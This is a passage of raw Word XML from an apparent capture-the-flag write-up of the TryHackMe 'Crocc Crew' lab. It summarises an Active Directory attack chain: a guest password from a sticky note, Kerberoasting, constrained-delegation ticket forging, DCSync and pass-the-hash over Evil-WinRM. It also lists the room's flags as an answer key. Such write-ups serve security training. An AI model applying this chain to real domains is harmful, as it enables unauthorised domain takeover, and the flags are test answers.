        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 17 - Privileged-user flags (priv-esc.txt, priv-esc-2.txt) read from C:\Shares\Home.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privileged User flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>THM{0n-Y0ur-Way-t0-DA}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
        <w:br/>
        <w:t xml:space="preserve">Second Privileged User flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>THM{Wh4t-t0-d0...Wh4t-t0-d0}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The root flag was located separately under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>C:\PerfLogs\Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</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*Evil-WinRM* PS C:\PerfLogs\Admin&gt; type root.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{Cr0ccCrewStr1kes!}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="2676525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture 1465609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65609447"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2676525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 18 - Root flag read from C:\PerfLogs\Admin\root.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root flag: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>THM{Cr0ccCrewStr1kes!}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc234251549"/>
      <w:r>
        <w:rPr/>
        <w:t>4. Attack Chain Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="700"/>
        <w:gridCol w:w="2199"/>
        <w:gridCol w:w="6461"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199"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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6461"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6461"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Nmap identified an IIS 10.0 web server and core AD services (DNS, Kerberos, LDAP, SMB, RDP).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RDP connection to 10.64.148.30 exposed a login-screen sticky note with Visitor : GuestLogin!.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6461"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Visitor credentials used to access the Home SMB share and capture user.txt (THM{Gu3st_Pl3as3}), then enumerate LDAP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kerberoasting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extracted the TGS-REP for the password-reset SPN account and cracked it offline (resetpassword).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Delegation Abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FFFFFF" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>password-reset held Constrained Delegation w/ Protocol Transition to oakley/DC.COOCTUS.CORP; S4U2Self/S4U2Proxy forged an Administrator service ticket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain Dominance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F7F9FC" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DCSync extracted the Administrator hash; Pass-the-Hash over WinRM gave a DA shell, then all remaining flags were collected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc234251550"/>
      <w:r>
        <w:rPr/>
        <w:t>4.1 Room Objective / Flag Register</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Crocc Crew room defines five objectives. The table below tracks each, its captured value, and where it was obtained. All five were captured during the engagement.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="549"/>
        <w:gridCol w:w="3191"/>
        <w:gridCol w:w="3162"/>
        <w:gridCol w:w="2458"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="549"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3191"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Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3162"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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458"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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="549"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3191"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3162"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E7D32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{Gu3st_Pl3as3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="5B6472"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\Shares\Home\user.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="549"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3191"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Name of account Crocc Crew planted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3162"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E7D32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>admCroccCrew</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="5B6472"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain user enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="549"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3191"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privileged User's flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3162"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E7D32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{0n-Y0ur-Way-t0-DA}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="5B6472"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\Shares\Home\priv-esc.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="549"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3191"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Second Privileged User's flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3162"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E7D32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{Wh4t-t0-d0...Wh4t-t0-d0}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="5B6472"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\Shares\Home\priv-esc-2.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="549"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
